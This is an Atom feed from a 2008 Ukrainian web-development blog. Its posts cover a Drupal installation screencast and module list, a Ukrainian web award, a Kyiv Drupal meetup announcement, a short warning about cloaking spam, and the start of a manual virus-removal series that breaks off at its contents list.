<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>безпека</title>
  <link rel="alternate" type="text/html" href="http://my.ukrweb.info/%D1%82%D0%B5%D0%B3%D0%B8-%D1%96-%D0%BA%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D1%96%D1%97/%D0%B1%D0%B5%D0%B7%D0%BF%D0%B5%D0%BA%D0%B0"/>
  <link rel="self" type="application/atom+xml" href="http://my.ukrweb.info/taxonomy/term/135/atom/feed"/>
  <id>http://my.ukrweb.info/taxonomy/term/135/atom/feed</id>
  <updated>2008-08-22T16:09:30+03:00</updated>
  <entry>
    <title>IT подкаст #4 - Скрінкаст &quot;Друпал для блогера - інсталяція&quot;</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/09/4/it-%D0%BF%D0%BE%D0%B4%D0%BA%D0%B0%D1%81%D1%82-4-%D1%81%D0%BA%D1%80%D1%96%D0%BD%D0%BA%D0%B0%D1%81%D1%82-%D0%B4%D1%80%D1%83%D0%BF%D0%B0%D0%BB-%D0%B4%D0%BB%D1%8F-%D0%B1%D0%BB%D0%BE%D0%B3%D0%B5%D1%80%D0%B0-%D1%96%D0%BD%D1%81%D1%82%D0%B0%D0%BB%D1%8F%D1%86%D1%96%D1%8F" />
    <id>http://my.ukrweb.info/2008/09/4/it-%D0%BF%D0%BE%D0%B4%D0%BA%D0%B0%D1%81%D1%82-4-%D1%81%D0%BA%D1%80%D1%96%D0%BD%D0%BA%D0%B0%D1%81%D1%82-%D0%B4%D1%80%D1%83%D0%BF%D0%B0%D0%BB-%D0%B4%D0%BB%D1%8F-%D0%B1%D0%BB%D0%BE%D0%B3%D0%B5%D1%80%D0%B0-%D1%96%D0%BD%D1%81%D1%82%D0%B0%D0%BB%D1%8F%D1%86%D1%96%D1%8F</id>
    <published>2008-09-25T13:22:28+03:00</published>
    <updated>2008-09-25T15:36:23+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="blog" />
    <category term="drupal" />
    <category term="безпека" />
    <category term="вебдизайн" />
    <category term="вебмайстер" />
    <category term="локалізація" />
    <category term="огляд" />
    <category term="подкаст" />
    <category term="скрінкаст" />
    <summary type="html"><![CDATA[<p>Як я обіцяв <a href="http://blogosphere.com.ua">Ярославу Федораку</a> - викладаю скрінкаст.<br />
Тема - інсталяція Друпала для блогінгу.</p>
<p>Якщо клікнути далі - є ризик додати до свого лічильника ~61 мегабайт трафіку 8).<br />
Перейшовши по посиланню на blip.tv можна подивитись відео в кращій якості (xvid4 + mp3) в форматі AVI</p>
    ]]></summary>
    <content type="html"><![CDATA[<p>Як я обіцяв <a href="http://blogosphere.com.ua">Ярославу Федораку</a> - викладаю скрінкаст.<br />
Тема - інсталяція Друпала для блогінгу.</p>
<p>Якщо клікнути далі - є ризик додати до свого лічильника ~61 мегабайт трафіку 8).<br />
Перейшовши по посиланню на blip.tv можна подивитись відео в кращій якості (xvid4 + mp3) в форматі AVI<br />
&lt;!--break--><br />
Якщо комусь  буде потрібна DVD якість - зв'яжіться зі мною. </p>
<p><center style="align:middle"></center></p>
<object
    type="application/x-shockwave-flash"
    classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
    codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"
    width="536"
    height="462"
    id="showplayer"
    allowfullscreen="true"
    allowscriptaccess="always"
    autostart="false"
    style="align:middle"
>
    <param name="movie"
        value="http://blip.tv/scripts/flash/showplayer.swf?file=http://blip.tv/file/get/Podarok-drupal_64_for_blogging_uk_how_to_install857.flv"
 />
     <param name="allowscriptaccess" value="always" />
     <param name="allowfullscreen" value="true" />
     <param name="quality" value="best" />
     <param name="wmode" value="window" />
     <param name="autostart" value="false" />
     <center><embed style="align:middle"
        type="application/x-shockwave-flash"
        width="536"
        height="462"
        id="shoplayerembed"
        src="http://blip.tv/scripts/flash/showplayer.swf?file=http://blip.tv/file/get/Podarok-drupal_64_for_blogging_uk_how_to_install857.flv"
        pluginspage="http://www.macromedia.com/go/getflashplayer"
        wmode="window"
        allowfullscreen="true"
        allowscriptaccess="always"
     /></embed></center>



 Запитання і пропозиції в коментарях.  <div>http://podarok.blip.tv/file/1292578</div><div><br/></br/></div><div>Копія тексту з скрінкасту.</div><div><br/></br/></div><blockquote class="webkit-indent-blockquote" style="margin: 0 0 0 40px; border: none; padding: 0px;"><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">1 стягуєм потрібну версію друпал з drupal.org</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">2 розпаковуєм на хостінг</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">3 стягуєм переклад і також розпаковуєм</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Verdana; color: #a7131c; background-color: #fdd2d3">4 The Drupal installer requires that you create a settings file as part of the installation process.</p> <ol style="list-style-type: decimal"> <li style="margin: 0.0px 0.0px 1.0px 0.0px; line-height: 20.0px; font: 23.0px Verdana; color: #a7131c; background-color: #fdd2d3">Copy the <em>./sites/default/default.settings.php</em> file to <em>./sites/default/settings.php</em>.</li> </ol> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica; min-height: 28.0px"><br/></br/></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Verdana; color: #2c290e; background-color: #fffde5">5  Consider increasing your PHP memory limit to <em>16M</em> to help prevent errors in the installation process.</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">6 Створюєм базу даних</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">7 створюєм користувача для роботи з базою даних</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">8 створюєм користувача адміністратора друпал</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">9 вмикаєм модуль Locale</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">10 додаєм мову uk-ua</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">11 робим мову базовою</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Verdana; color: #545454">12 Path prefix only.</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">13 Додаєм набір блогера.</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- capcha <a href="http://drupal.org/project/captcha">http://drupal.org/project/captcha</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- captcha_pack <a href="http://drupal.org/project/captcha_pack">http://drupal.org/project/captcha_pack</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- commentrss <a href="http://drupal.org/project/commentrss">http://drupal.org/project/commentrss</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- dhtml menu <a href="http://drupal.org/project/dhtml_menu">http://drupal.org/project/dhtml_menu</a></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- external links <a href="http://drupal.org/project/extlink">http://drupal.org/project/extlink</a></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- fivestar <a href="http://drupal.org/project/fivestar">http://drupal.org/project/fivestar</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- gravatar <a href="http://drupal.org/project/gravatar">http://drupal.org/project/gravatar</a></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- pathauto <a href="http://drupal.org/project/pathauto">http://drupal.org/project/pathauto</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- pathologic <a href="http://drupal.org/project/pathologic">http://drupal.org/project/pathologic</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- tagadelic <a href="http://drupal.org/project/tagadelic">http://drupal.org/project/tagadelic</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- taxonomy manager <a href="http://drupal.org/project/taxonomy_manager">http://drupal.org/project/taxonomy_manager</a></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- token <a href="http://drupal.org/project/token">http://drupal.org/project/token</a></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- trackback <a href="http://drupal.org/project/trackback">http://drupal.org/project/trackback</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- voling API <a href="http://drupal.org/project/votingapi">http://drupal.org/project/votingapi</a></strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">14 інсталяція модулів і конфігурування</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- /admin/settings/votingapi - Tally results at cron-time</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Verdana; color: #545454">- /admin/settings/extlink - Open external links in a new window</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- /admin/settings/site-information - </p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- /admin/settings/uploads - допустимі максимуми</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- /admin/settings/performance - агрегатори CSS + JS</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- /admin/user/permissions - зробити доступи для аноніма і аналогічні для зареєстрованого</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">- /admin/content/taxonomy/add/vocabulary - створюєм головний словник для тагів і вказати типи матеріалів, для яких використовувати тегування</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- /admin/build/path/pathauto - шаблони назв сторінок</strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica"><strong>- /admin/user/captcha - ха</strong></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 23.0px Helvetica">15 <em><strong>додати Статті на сайт!</strong></em></p></blockquote></object
>    ]]></content>
  </entry>
  <entry>
    <title>UA Webstar 2008</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/08/3/ua-webstar-2008" />
    <id>http://my.ukrweb.info/2008/08/3/ua-webstar-2008</id>
    <published>2008-08-27T21:01:29+03:00</published>
    <updated>2008-08-30T01:14:14+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="ua" />
    <category term="ua webstar" />
    <category term="ukrweb" />
    <category term="webmaster" />
    <category term="безпека" />
    <category term="вебдизайн" />
    <category term="вебмайстер" />
    <category term="вибір" />
    <category term="дизайн" />
    <category term="новини" />
    <summary type="html"><![CDATA[<p>Сьогодні, 27.08.2008, відкрито офіційно <a href="http://uawebstar.org">вебсайт UA WebStar 2008</a><br />
Поки що не вирішив, чи буду приймати участь, хоча бажання таке є.</p>
    ]]></summary>
    <content type="html"><![CDATA[<p>Сьогодні, 27.08.2008, відкрито офіційно <a href="http://uawebstar.org">вебсайт UA WebStar 2008</a><br />
Поки що не вирішив, чи буду приймати участь, хоча бажання таке є.<br />
&lt;!--break--><br />
<span style="color:blue;border-bottom:1px dashed" onclick="$('#ua_webstar_announce').slideToggle()" onmouseover="$(this).css('border-bottom','1px solid')" onmouseout="$(this).css('border-bottom','1px dashed')">Офіційний текст новини</span></p>
<blockquote id="ua_webstar_announce" style="display:none">
<p><a href="http://uawebstar.org/" target="_blank">UA Webstar</a> - це українська інтернет-нагорода. Що на нас чекає цього року?</p>
<ul>
<li>10 номінацій+1 додаткова</li>
<li>жорстікіші та гнучкіші <a href="http://uawebstar.org/rules/" target="_blank">правила</a></li>
<li>голосування у 2 тури</li>
<li>додаткове голосування журі</li>
<li>врахування грубих помилок минулого року</li>
<li>новий гарний сайт (який видно у всіх браузерах!)</li>
<li>багато <a href="http://uawebstar.org/project/" target="_blank">матеріалів</a> для преси та блогерів (прес-релізи, логотипи, кнопки)</li>
<li><a href="http://uawebstar.org/news/" target="_blank">новини</a> з <a href="http://feeds.feedburner.com/UaWebstar" target="_blank">RSS-стрічкою</a>, в яких буде чимало цікавого</li>
<li>ну і звісно, пропозиції <a href="http://uawebstar.org/sponsors/" target="_blank">для спонсорів</a></li>
</ul>
<p>Прийом заявок почнеться вже 1 вересня. Ну а власне голосування - 6 жовтня. Результати, за доброю традицією, будуть оголошені напередодні Нового року.</p>
</blockquote>
<p>З свого боку бажаю успіху даному проекту і побільше спонсорської допомоги.</p>
    ]]></content>
  </entry>
  <entry>
    <title>Київський Drupal minicamp 2008</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/08/5/%D0%BA%D0%B8%D1%97%D0%B2%D1%81%D1%8C%D0%BA%D0%B8%D0%B9-drupal-minicamp-2008" />
    <id>http://my.ukrweb.info/2008/08/5/%D0%BA%D0%B8%D1%97%D0%B2%D1%81%D1%8C%D0%BA%D0%B8%D0%B9-drupal-minicamp-2008</id>
    <published>2008-08-22T12:47:59+03:00</published>
    <updated>2008-08-31T02:13:58+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="drupal" />
    <category term="html" />
    <category term="php" />
    <category term="ukrweb" />
    <category term="webmaster" />
    <category term="безпека" />
    <category term="вебдизайн" />
    <category term="вебмайстер" />
    <category term="дизайн" />
    <summary type="html"><![CDATA[<p>Вітаю!</p>
<div>Щойно побачив новину про Київський Drupal Camp</div>
<div>
<center><br />
<a class="hasCorners" href="http://groups.google.com/group/kyiv-minibars"><img src="/files/drupalcamp-kyiv-logo.png" /></a></center></div>

<p>Докладніше на <a href="http://habrahabr.ru/blogs/drupal/37601/">Хабрі </a>та у <a href="http://groups.google.com/group/kyiv-minibars/browse_thread/thread/459a4bdefa80f6d4">Гугл-Групі</a>.</p>
    ]]></summary>
    <content type="html"><![CDATA[<p>Вітаю!
<div>Щойно побачив новину про Київський Drupal Camp</div>
<div>
<center><br />
<a class="hasCorners" href="http://groups.google.com/group/kyiv-minibars"><img src="/files/drupalcamp-kyiv-logo.png" /></a></center></div></p>
<p>Докладніше на <a href="http://habrahabr.ru/blogs/drupal/37601/">Хабрі </a>та у <a href="http://groups.google.com/group/kyiv-minibars/browse_thread/thread/459a4bdefa80f6d4">Гугл-Групі</a>.</p>
<p><br class="webkit-block-placeholder" />
<div><br/></br/></div>
<div><br/></br/></div>
<blockquote class="webkit-indent-blockquote" style="margin: 0 0 0 40px; border: none; padding: 0px;"><table cellpadding="0" cellspacing="0" border="0" style="font-size: inherit; ">
<tbody>
<tr>
<td class="thread_star" width="17" id="thread_watch_site" style="font-family: arial, sans-serif; padding-top: 0px; padding-right: 0px; padding-bottom: 4px; padding-left: 0px; "><a class="st" id="watchkyiv-minibars@459a4bdefa80f6d4" name="watchkyiv-minibars@459a4bdefa80f6d4" value="0" target="_parent" href="http://groups.google.com/group/kyiv-minibars/watch_topic?WebToken=4816d63320843141c88281a3cea3ae7f&amp;tid=459a4bdefa80f6d4&amp;oldstate=0" onclick="return toggleStar('4816d63320843141c88281a3cea3ae7f', 'kyiv-minibars', '459a4bdefa80f6d4', 1);" style="margin-left: -1px; color: rgb(0, 0, 204); "><img border="0" class="stimg" align="absmiddle" width="15" height="15" title="Клацніть зірочку, щоб побачити тему" id="watchkyiv-minibars@459a4bdefa80f6d4_img" name="watchkyiv-minibars@459a4bdefa80f6d4_img" src="http://groups.google.com/groups/img/watched_n.gif" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-top-color: rgb(0, 0, 160); border-right-color: rgb(0, 0, 160); border-bottom-color: rgb(0, 0, 160); border-left-color: rgb(0, 0, 160); " /></a></td>
<td style="font-family: arial, sans-serif; ">
<div class="fontsize2" id="thread_threadsub_site2" style="font-size: 91%; "></div>
</td>
<td style="font-family: arial, sans-serif; ">
<div class="fontsize2" id="sticky_icon_site" style="font-size: 91%; "></div>
</td>
<td width="5" style="font-family: arial, sans-serif; "> </td>
<td align="left" width="100%" style="font-family: arial, sans-serif; "><span class="Apple-style-span" style="color: rgb(119, 119, 204); text-decoration: underline;"><br/></br/></span></td>
<td align="right" style="font-family: arial, sans-serif; "><nobr id="thread_page_links_site">  <a class="on fontsize2" title="22 Сер - 22 Сер" href="http://groups.google.com/group/kyiv-minibars/browse_thread/thread/459a4bdefa80f6d4/4f42f5e3c3dbbc3d" style="font-size: 91%; color: rgb(0, 0, 204); ">Новіші &gt;</a></nobr></td>
</tr>
</tbody>
</table>
<div id="msgs">
<div style="margin-left: -3px; margin-right: -1px; "><iframe name="post_res" id="post_res" style="position: absolute; visibility: hidden; width: 1px; height: 1px; "></iframe><img class="hide" id="chrn" src="http://groups.google.com/groups/img/chevron_left_blue.gif" height="11" width="9" style="position: absolute; z-index: 2; left: 11px; top: 153px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-top-color: rgb(0, 0, 160); border-right-color: rgb(0, 0, 160); border-bottom-color: rgb(0, 0, 160); border-left-color: rgb(0, 0, 160); display: none; " /><br />
<table cellpadding="0" border="0" cellspacing="0" style="font-size: inherit; ">
<tbody>
<tr>
<td style="font-family: arial, sans-serif; "><img src="http://groups.google.com/groups/img/dot_clear.gif" height="1" width="1" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-top-color: rgb(0, 0, 160); border-right-color: rgb(0, 0, 160); border-bottom-color: rgb(0, 0, 160); border-left-color: rgb(0, 0, 160); " /></td>
<td width="100%" style="font-family: arial, sans-serif; ">
<div class="msg wdth100" id="msg_78c0fb3960107e4a" onmouseover="if (G2_cardManager) {G2_cardManager._getMessage('78c0fb3960107e4a')._load();}" style="margin-top: 0px; margin-right: -1px; margin-bottom: 0px; margin-left: -1px; display: block; width: 100%; ">
<div id="hdr">
<table id="top" class="h msg_meta" cellpadding="0" cellspacing="0" style="font-size: inherit; width: 100%; cursor: pointer; ">
<tbody>
<tr>
<td style="font-family: arial, sans-serif; white-space: nowrap; "><strong><span style="color: rgb(0, 104, 28); ">Ярослав Ажнюк</span>  </strong></td>
<td width="100%" style="font-family: arial, sans-serif; white-space: nowrap; ">
<table class="rc" cellpadding="0" cellspacing="0" style="font-size: inherit; width: 100%; table-layout: fixed; ">
<tbody>
<tr>
<td style="font-family: arial, sans-serif; white-space: nowrap; "><a target="_top" href="http://groups.google.com/groups/profile?enc_user=NegLJBMAAACU7q5DOmYTzu4AU9KuouXNWMj6vob75xS36mXc24h6ww" style="color: rgb(0, 0, 204); ">Переглянути профіль</a></td>
</tr>
</tbody>
</table>
</td>
<td align="right" nowrap="nowrap" style="font-family: arial, sans-serif; white-space: nowrap; "> <span class="fontsize2" style="font-size: 91%; ">19 Сер, 23:49</span></td>
</tr>
</tbody>
</table>
</div>
<div id="body" class="mb cb fontsize2 " style="font-size: 91%; padding-top: 6px; padding-right: 8px; padding-bottom: 0px; padding-left: 14px; background-image: url("http://groups.google.com/groups/img/card_left.gif); background-repeat: repeat-y; border-right-width: 1px; border-right-color: rgb(232, 232, 232); border-right-style: solid; background-position: 0% 50%; ">
<div id="inbdy">
<p><a name="msg_78c0fb3960107e4a"></a><font face="Courier, Monospaced" class="fixed_width" style="font-family: fixed-width, monospace; font-size: 100%; ">Привіт! <br/></br/></font></p>
<p><font face="Courier, Monospaced" class="fixed_width" style="font-family: fixed-width, monospace; font-size: 100%; "></font>
</p><p>Саме час подумати над організаційними питаннями першого київського <br/>DrupalCamp`у. <br/>Пропоную діяти за відлагодженю схемою, яку колись подав Максон. По пунктах <br/>все розписано тут: <br/><a target="_blank" rel="nofollow" href="http://groups.google.com/group/kyiv-minibars/web/minicamp-roles.doc" style="color: rgb(85, 26, 139); ">http://groups.google.com/group/kyiv-minibars/web/minicamp-roles.doc</a> <br/></br/></br/></br/></br/></br/></p>
<p>Оскільки друпалКемп був моєю ідеєю, то нелегка роль координатора на мені. <br/>Я вже домовився про приміщення G-club на 12:00, 31 серпня, неділю - спасибі <br/>Олені Єрмаковій за розуміня та підтримку. <br/></br/></br/></br/></p>
<p>Для тих хто ще не був у G-club - карта: <br/><a target="_blank" rel="nofollow" href="http://maps.yandex.ua/map.xml?mapID=1600&amp;mapX=3397191&amp;mapY=6485948&amp;scale=7&amp;slices=1&amp;descx=3397186&amp;descy=6485926" style="color: rgb(0, 0, 204); ">http://maps.yandex.ua/map.xml?mapID=1600&amp;mapX=3397191&amp;mapY=6485948&amp;sc...</a> <br/></br/></br/></p>
<p>Заходити через головний вхід, у приміщенні мають бути стрілочки, тому не <br/>загубитеся. На вході буде сидіти консьєрж і видавати пропуски. Йому слід <br/>сказати, що ви на DrupalCamp. <br/></br/></br/></br/></p>
<p>Ось які у мене є питання: <br/>1. Хто буде модератором? <br/>2. Хто буде блоґером? <br/>3. Хто займеться реєстрацією на вході? <br/>4. Які теми презнтацій ви би хотіли почути / з якою темою ви готові <br/>виступити. Крім, власне, презентації це також може бути обговорення, <br/>мозковий штурм, чи будь-який інший формат, який вам до вподоби. <br/></br/></br/></br/></br/></br/></br/></br/></p>
<p>Схоже, що аудиторія буде мішаною за зацікавленнями: частина - це, власне, <br/>друпал-девелопери, інша частина - люди що шукають друпал-девелоперів. <br/>Напевне також будуть і ті, що думають: "а чи не стати й собі <br/>друпал-девелопером?". Сподіваюся, що на цьому мінікемпі ми побачимо багато <br/>нових облич ) <br/></br/></br/></br/></br/></br/></p>
<p>Прошу поширити інформацію про цей мініКемп там, де її охоче читатимуть. Хто <br/>готовий написати пост на Хабрі? <br/></br/></br/></p>
<p><font face="Courier, Monospaced" class="fixed_width" style="font-family: fixed-width, monospace; font-size: 100%; ">-- <br/>Yaroslav Azhnyuk director of Internet Intiatives NGO, Kyiv <br/><br/><a target="_blank" rel="nofollow" href="http://internetinitiatives.org/" style="color: rgb(0, 0, 204); ">http://internetinitiatives.org/</a>&lt;<a target="_blank" rel="nofollow" href="http://internetinitiatives.org/%20" style="color: rgb(0, 0, 204); ">http://internetinitiatives.org/%20</a>&gt; <br/>mobile:+380506404168 | skype:  yaroslav.azhnyuk <br/></br/></br/></br/></br/></br/></font></p>
</div>
<p><br/></br/></p></div>
<div id="cb" class="" style="display: block; ">
<div class="cg cb2" style="background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); background-image: url("http://groups.google.com/groups/img/card_left2.gif"); background-repeat: repeat-y; border-right-width: 1px; border-right-color: rgb(232, 232, 232); border-right-style: solid; background-position: 0% 50%; ">
<div class="cg cb2" style="background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); background-image: url("http://groups.google.com/groups/img/card_left2.gif"); background-repeat: repeat-y; border-right-width: 1px; border-right-color: rgb(232, 232, 232); border-right-style: solid; background-position: 0% 50%; ">
<div class="cg cb2" style="background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); background-image: url("http://groups.google.com/groups/img/card_left2.gif"); background-repeat: repeat-y; border-right-width: 1px; border-right-color: rgb(232, 232, 232); border-right-style: solid; background-position: 0% 50%; ">  <span class="nsel_cb_t b" id="r" style="font-weight: bold; ">  <a target="_top" href="http://groups.google.com/group/kyiv-minibars/post?inreplyto=78c0fb3960107e4a&amp;reply_to=group&amp;_done=%2Fgroup%2Fkyiv-minibars%2Fbrowse_thread%2Fthread%2F459a4bdefa80f6d4%3F&amp;" style="color: rgb(0, 0, 204); ">Відповісти</a>  </span><span class="nsel_cb_t" id="ra">  <a target="_top" href="http://groups.google.com/group/kyiv-minibars/post?inreplyto=78c0fb3960107e4a&amp;reply_to=author&amp;_done=%2Fgroup%2Fkyiv-minibars%2Fbrowse_thread%2Fthread%2F459a4bdefa80f6d4%3F&amp;" style="color: rgb(0, 0, 204); ">Відповісти автору</a>  </span><span class="nsel_cb_t" id="f">  <a target="_top" href="http://groups.google.com/group/kyiv-minibars/post?inreplyto=78c0fb3960107e4a&amp;forward=1&amp;_done=%2Fgroup%2Fkyiv-minibars%2Fbrowse_thread%2Fthread%2F459a4bdefa80f6d4%3F&amp;" style="color: rgb(0, 0, 204); ">Переслати</a>  </span> </div>
</div>
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</blockquote></p>
<div><br/></br/></div>
<div><br/></br/></div>
<div>Не знаю, чи зможу про щось розповісти, але послухати точно буде цікаво.</div>
<div><a href="http://groups.google.com/group/kyiv-minibars">Приєднуйтесь.</a></div>
<blockquote class="webkit-indent-blockquote" style="margin: 0 0 0 40px; border: none; padding: 0px;"><div id="hdr"><strong><br/></br/></strong></div>
</blockquote>
    ]]></content>
  </entry>
  <entry>
    <title>Спам - клоакінг</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/06/4/%D1%81%D0%BF%D0%B0%D0%BC-%D0%BA%D0%BB%D0%BE%D0%B0%D0%BA%D1%96%D0%BD%D0%B3" />
    <id>http://my.ukrweb.info/2008/06/4/%D1%81%D0%BF%D0%B0%D0%BC-%D0%BA%D0%BB%D0%BE%D0%B0%D0%BA%D1%96%D0%BD%D0%B3</id>
    <published>2008-06-05T13:01:03+03:00</published>
    <updated>2008-06-12T03:43:54+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="search" />
    <category term="seo" />
    <category term="ua" />
    <category term="webmaster" />
    <category term="безпека" />
    <category term="вебдизайн" />
    <category term="вебмайстер" />
    <category term="спам" />
    <summary type="html"><![CDATA[<p>Клоакінг і з чим його їдять...Привіт страждущим...<br />
Давненько я нічого сюди не писав.. А от сьогодні при пошуку натрапив на веселу і цікаву технологію, про яку раніше писАв, яку використовують іноді "веброзробники" для розкрутки своїх-чужих сайтів...<br />
Технологія дуже гарно випасається пошуковиками, але іноді зустрічається...</p>
<p>Загалом сторінки генеруються в основному чисто випадковим методом з певного набору слів, які часто не несуть важливої інформації, але пошуковиками індексуються і приносять лівих користувачів, що дозволяє задурити голову замовнику, на вебсайт якого линуть кліки....</p>
    ]]></summary>
    <content type="html"><![CDATA[<p>Клоакінг і з чим його їдять...Привіт страждущим...<br />
Давненько я нічого сюди не писав.. А от сьогодні при пошуку натрапив на веселу і цікаву технологію, про яку раніше писАв, яку використовують іноді "веброзробники" для розкрутки своїх-чужих сайтів...<br />
Технологія дуже гарно випасається пошуковиками, але іноді зустрічається...</p>
<p>Загалом сторінки генеруються в основному чисто випадковим методом з певного набору слів, які часто не несуть важливої інформації, але пошуковиками індексуються і приносять лівих користувачів, що дозволяє задурити голову замовнику, на вебсайт якого линуть кліки....<br />
Він(замовник) же не знає, що кліки - ліві і толку від них 0... </p>
<p>Отже приклад...<br />
<a href="/files/cloacking1.png"><img src="/files/cloacking1.png" width="50%" height="50%" alt="Приклад клоакінгу для Ґуґла" title="клоакінг" /></a></p>
<p>Випасається він пошуковиками регулярно і після цього домен потрапляє в спам зону...</p>
<p>Успіху Вам і поменше спаму!</p>
    ]]></content>
  </entry>
  <entry>
    <title>Віруси - боремось вручну - прелюдія</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/03/1/%D0%B2%D1%96%D1%80%D1%83%D1%81%D0%B8-%D0%B1%D0%BE%D1%80%D0%B5%D0%BC%D0%BE%D1%81%D1%8C-%D0%B2%D1%80%D1%83%D1%87%D0%BD%D1%83-%D0%BF%D1%80%D0%B5%D0%BB%D1%8E%D0%B4%D1%96%D1%8F" />
    <id>http://my.ukrweb.info/2008/03/1/%D0%B2%D1%96%D1%80%D1%83%D1%81%D0%B8-%D0%B1%D0%BE%D1%80%D0%B5%D0%BC%D0%BE%D1%81%D1%8C-%D0%B2%D1%80%D1%83%D1%87%D0%BD%D1%83-%D0%BF%D1%80%D0%B5%D0%BB%D1%8E%D0%B4%D1%96%D1%8F</id>
    <published>2008-03-17T15:03:14+02:00</published>
    <updated>2008-08-30T01:35:34+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="IT" />
    <category term="ua" />
    <category term="windows" />
    <category term="безпека" />
    <category term="огляд" />
    <category term="спам" />
    <summary type="html"><![CDATA[<div lang="uk-UA">Вірусологія - досить цікава та складни наука. Вивчення методик взлому та аналізу після цього - дуже хороший метод навчитись безпеці та методології налагодження безпеки.<br/>Спробую розпочати цикл статей, з власного досвіду, який сподіваюсь допоможе комусь в розумінні та аналізі різноманітних систем. <br/>Початок - на прикладі windows. <br/>А далі - в залежності від своїх, а також Ваших побажань.</br/></br/></br/></div>
    ]]></summary>
    <content type="html"><![CDATA[<div lang="uk-UA">Вірусологія - досить цікава та складни наука. Вивчення методик взлому та аналізу після цього - дуже хороший метод навчитись безпеці та методології налагодження безпеки.<br/>Спробую розпочати цикл статей, з власного досвіду, який сподіваюсь допоможе комусь в розумінні та аналізі різноманітних систем. <br/>Початок - на прикладі windows. <br/>А далі - в залежності від своїх, а також Ваших побажань.</br/></br/></br/></div>
<p>&lt;!--break--><br />
<div class="toc">
<div class="toc-title">Меню 8) сторінки [<a href="#" class="toc-toggle">hide</a>]</div>
<div class="toc-list">
<ol>
<ol>
<li><a href="#-1">Що таке вінда?</a></li>
<li><a href="#-2">Проблеми безпеки</a>
<ol>
<li><a href="#-3">Параметри за замовчуванням</a></li>
